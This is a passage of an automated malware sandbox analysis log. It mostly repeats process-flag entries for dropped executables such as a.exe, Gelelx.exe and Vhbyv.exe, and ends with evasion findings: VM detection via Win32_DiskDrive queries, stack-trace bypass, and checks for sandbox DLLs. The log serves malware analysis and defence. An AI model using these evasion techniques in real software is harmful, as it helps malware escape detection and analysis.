                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\AppData\Roaming\a.exeAPI/Special instruction interceptor: Address: 7FFCC372E814
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeMemory allocated: 3220000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeMemory allocated: 5220000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: 1680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: 33C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: 3300000 memory reserve | memory write watch
